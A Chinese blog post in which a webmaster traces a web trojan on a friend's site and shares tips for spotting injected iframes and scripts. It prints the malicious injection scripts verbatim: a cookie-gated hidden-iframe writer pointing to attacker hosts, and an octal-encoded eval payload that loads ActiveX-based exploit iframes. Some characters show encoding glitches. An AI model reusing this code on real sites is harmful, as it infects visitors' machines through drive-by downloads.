昨晚深邃網(wǎng)友一諾小朋友向我報(bào)告說友情鏈接有一個(gè)網(wǎng)站有木馬,我一看,暈,那個(gè)不是我正在幫朋友做關(guān)
鍵詞優(yōu)化的QQ個(gè)性簽名么?一開始以為只是殺軟誤報(bào),加上我也沒有裝殺毒軟件(一直沒中過病毒),所以就沒怎么管他?
今天起來用新手機(jī)((*^__^*) 嘻嘻……,俺買了黑莓8100)打開百度搜索一下QQ個(gè)性簽名,暈,排名不知道掉到第幾頁(yè)了。我就郁悶了,自己的SEO優(yōu)化一直都是很溫柔的上的啊,怎么會(huì)被降權(quán)了?于是就猜想可能真的被掛馬了,因?yàn)槭且菜闶莿傉J(rèn)識(shí)的朋友,當(dāng)然要幫忙處理一下這些瑣碎的問題啦?;貋碇?,馬上啟用德國(guó)殺軟小紅傘,“滴滴”兩聲,打開QQ個(gè)性簽名的時(shí)候報(bào)警了。于是打開html代碼查看,既然沒有iframe,這就奇怪了。于是清理緩存再次打開網(wǎng)頁(yè),根據(jù)小紅傘提供的資料找到了報(bào)警的文件:info[1].js,打開得到下面的代碼:
var az=document.cookie;
var za=az.indexOf(”qqqq”);
if(za!=-1){}else{var expires=new Date();expires.setTime(expires.getTime() 24*60*60*1000);
document.cookie=”qqqq=web;expires=” expires.toGMTString();
document.writeln(”iframe src=http:\/\/kkwwkkc.cn\/10\/zz.htm width=100 height=0>\/iframe>”);window.status=” “;}
我想問題應(yīng)該出在js代碼上,于是在代碼搜索js,一個(gè)是51la的統(tǒng)計(jì)的js,另外一個(gè)是div.js,51la的自然可以排除,所以我就打開div.js,然后看到了下面“此地?zé)o銀三百兩”的網(wǎng)址代碼(紅色字體的),一路跟蹤下去,果然發(fā)現(xiàn)可疑跡象。
// JavaScript Document
function showdiv(divnum,divbefor,id){
for(i=1;i=divnum;i ){
try{
if(i==divbefor){
document.getElementById(id i).style.display=”inline”;
}else{
document.getElementById(id i).style.display=”none”;
}
}catch(e){ }
}
}
function menuFix(){}
document.writeln(”script src=http:\/\/xishiyi.com\/images\/main\/info.js>\/script>”);
跟蹤代碼:http:\/\/xishiyi.com\/images\/main\/info.js
firefox直接輸入,轉(zhuǎn)換得到地址如下http://www.91q.org/templets/images/div.js打開代碼如下:
var az=document.cookie;
var za=az.indexOf(”qqqq”);
if(za!=-1){}else{var expires=new Date();expires.setTime(expires.getTime() 24*60*60*1000);
document.cookie=”qqqq=web;expires=” expires.toGMTString();
document.writeln(”iframe src=http:\/\/kkwwkkc.cn\/10\/zz.htm width=100 height=0>\/iframe>”);window.status=” “;}
繼續(xù)iframe跟蹤:http://kkwwkkc.cn/10/zz.htm
打開代碼如下:
iframe src=123.htm width=100 height=0>/iframe>
script language=”javascript” type=”text/javascript” src=”http://js.users.#/2191926.js”>/script>
noscript>a href=”http://www.#/?2191926″ target=”_blank”>img alt=”#x6211;#x8981;#x5566;#x514D;#x8D39;#x7EDF;#x8BA1;” src=”http://img.users.#/2191926.asp” style=”border:none” />/a>/noscript>
繼續(xù)iframe跟蹤:http://kkwwkkc.cn/10/123.htm
打開得到如下王八代碼:
script>
eval(”\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\42\74\151\146\162\141\155\145\40\167\151\144\164\150\75\62\60\40\150\145\151\147\150\164\75\60\40\163\162\143\75\146\154\141\163\150\56\150\164\155\76\74\57\151\146\162\141\155\145\76\42\51\73\15\12\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\42\74\151\146\162\141\155\145\40\167\151\144\164\150\75\61\60\60\40\150\145\151\147\150\164\75\60\40\163\162\143\75\141\163\56\150\164\155\76\74\57\151\146\162\141\155\145\76\42\51\73\15\12\167\151\156\144\157\167\56\163\164\141\164\165\163\75\42\55614\61020\42\73\15\12\167\151\156\144\157\167\56\157\156\145\162\162\157\162\75\146\165\156\143\164\151\157\156\50\51\173\162\145\164\165\162\156\40\164\162\165\145\73\175\15\12\151\146\50\156\141\166\151\147\141\164\157\162\56\165\163\145\162\101\147\145\156\164\56\164\157\114\157\167\145\162\103\141\163\145\50\51\56\151\156\144\145\170\117\146\50\42\155\163\151\145\40\67\42\51\75\75\55\61\51\15\12\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\42\74\151\146\162\141\155\145\40\167\151\144\164\150\75\62\60\40\150\145\151\147\150\164\75\60\40\163\162\143\75\61\64\56\150\164\155\76\74\57\151\146\162\141\155\145\76\42\51\73\15\12\164\162\171\173\166\141\162\40\146\73\15\12\166\141\162\40\147\147\75\156\145\167\40\101\143\164\151\166\145\130\117\142\152\145\143\164\50\42\107\114\111\105\104\157\167\156\56\111\105\104\157\167\156\56\61\42\51\73\175\15\12\143\141\164\143\150\50\146\51\173\175\73\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\15\12\146\151\156\141\154\154\171\173\151\146\50\146\41\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\51\173\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\42\74\151\146\162\141\155\145\40\167\151\144\164\150\75\61\60\60\40\150\145\151\147\150\164\75\60\40\163\162\143\75\154\172\56\150\164\155\76\74\57\151\146\162\141\155\145\76\42\51\73\175\175\15\12\164\162\171\173\166\141\162\40\155\73\15\12\166\141\162\40\150\150\75\156\145\167\40\101\143\164\151\166\145\130\117\142\152\145\143\164\50\42\104\157\167\156\154\157\141\144\145\162\56\104\114\157\141\144\145\162\56\61\42\51\73\175\15\12\143\141\164\143\150\50\155\51\173\175\73\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\15\12\146\151\156\141\154\154\171\173\151\146\50\155\41\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\51\173\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\42\74\151\146\162\141\155\145\40\167\151\144\164\150\75\61\60\60\40\150\145\151\147\150\164\75\60\40\163\162\143\75\163\151\156\141\56\150\164\155\76\74\57\151\146\162\141\155\145\76\42\51\73\175\175\15\12\164\162\171\173\166\141\162\40\156\73\15\12\166\141\162\40\154\154\75\156\145\167\40\101\143\164\151\166\145\130\117\142\152\145\143\164\50\42\163\156\160\166\167\56\123\156\141\160\163\150\157\164\40\126\151\145\167\145\162\40\103\157\156\164\162\157\154\56\61\42\51\73\175\15\12\143\141\164\143\150\50\156\51\173\175\73\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\15\12\146\151\156\141\154\154\171\173\151\146\50\156\41\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\51\173\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\42\74\151\146\162\141\155\145\40\167\151\144\164\150\75\61\60\60\40\150\145\151\147\150\164\75\60\40\163\162\143\75\157\146\146\151\143\145\56\150\164\155\76\74\57\151\146\162\141\155\145\76\42\51\73\175\175\15\12\164\162\171\173\166\141\162\40\142\73\15\12\166\141\162\40\155\155\75\156\145\167\40\101\143\164\151\166\145\130\117\142\152\145\143\164\50\42\116\103\124\101\165\144\151\157\106\151\154\145\62\56\101\165\144\151\157\106\151\154\145\62\56\62\42\51\73\175\15\12\143\141\164\143\150\50\142\51\173\175\73\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\15\12\146\151\156\141\154\154\171\173\151\146\50\142\41\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\51\173\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\42\74\151\146\162\141\155\145\40\167\151\144\164\150\75\61\60\60\40\150\145\151\147\150\164\75\60\40\163\162\143\75\116\103\124\101\165\144\151\157\106\151\154\145\56\150\164\155\76\74\57\151\146\162\141\155\145\76\42\51\73\175\175\15\12\146\165\156\143\164\151\157\156\40\164\145\163\164\50\51\15\12\173\15\12\162\162\157\157\170\170\40\75\40\42\111\105\122\42\40\53\40\42\120\103\164\154\56\111\42\40\53\40\42\105\122\120\42\40\53\40\42\103\164\154\56\61\42\73\15\12\164\162\171\15\12\173\15\12\114\151\153\145\40\75\40\156\145\167\40\101\143\164\151\166\145\130\117\142\152\145\143\164\50\162\162\157\157\170\170\51\73\15\12\175\143\141\164\143\150\50\145\162\162\157\162\51\173\162\145\164\165\162\156\73\175\15\12\166\166\166\166\166\40\75\40\114\151\153\145\56\120\154\141\171\145\162\120\162\157\160\145\162\164\171\50\42\120\122\117\104\125\103\124\126\105\122\123\111\117\116\42\51\73\15\12\151\146\50\166\166\166\166\166\74\75\42\66\56\60\56\61\64\56\65\65\62\42\51\15\12\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\42\74\151\146\162\141\155\145\40\167\151\144\164\150\75\61\60\60\40\150\145\151\147\150\164\75\60\40\163\162\143\75\162\145\61\60\56\150\164\155\76\74\57\151\146\162\141\155\145\76\42\51\73\15\12\145\154\163\145\15\12\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\42\74\151\146\162\141\155\145\40\167\151\144\164\150\75\61\60\60\40\150\145\151\147\150\164\75\60\40\163\162\143\75\162\145\61\61\56\150\164\155\76\74\57\151\146\162\141\155\145\76\42\51\73\15\12\175\15\12\164\145\163\164\50\51\73″)
/script>
鄙人才疏學(xué)淺,看不懂轉(zhuǎn)化了的代碼啥意思,不想去轉(zhuǎn)換,知道被掛馬就ok了,最后是跟朋友說讓他去掉那個(gè)代碼,清理緩存重新打開網(wǎng)頁(yè),ok,沒問題了。
寫這篇文章的用意在意告訴各位,要注意自己網(wǎng)站的安全,如果發(fā)現(xiàn)掛馬,不要錯(cuò)過每一個(gè)細(xì)節(jié),首先仔細(xì)檢查html頁(yè)面有沒有調(diào)用其他莫名的網(wǎng)站的東西,然后仔細(xì)分析自己頁(yè)面的js代碼,iframe是黑客們最常用的手段。實(shí)例一篇,希望對(duì)各位有用。這是我第一次抓馬,經(jīng)過自己的分析既然抓到了,很開心,特此分享……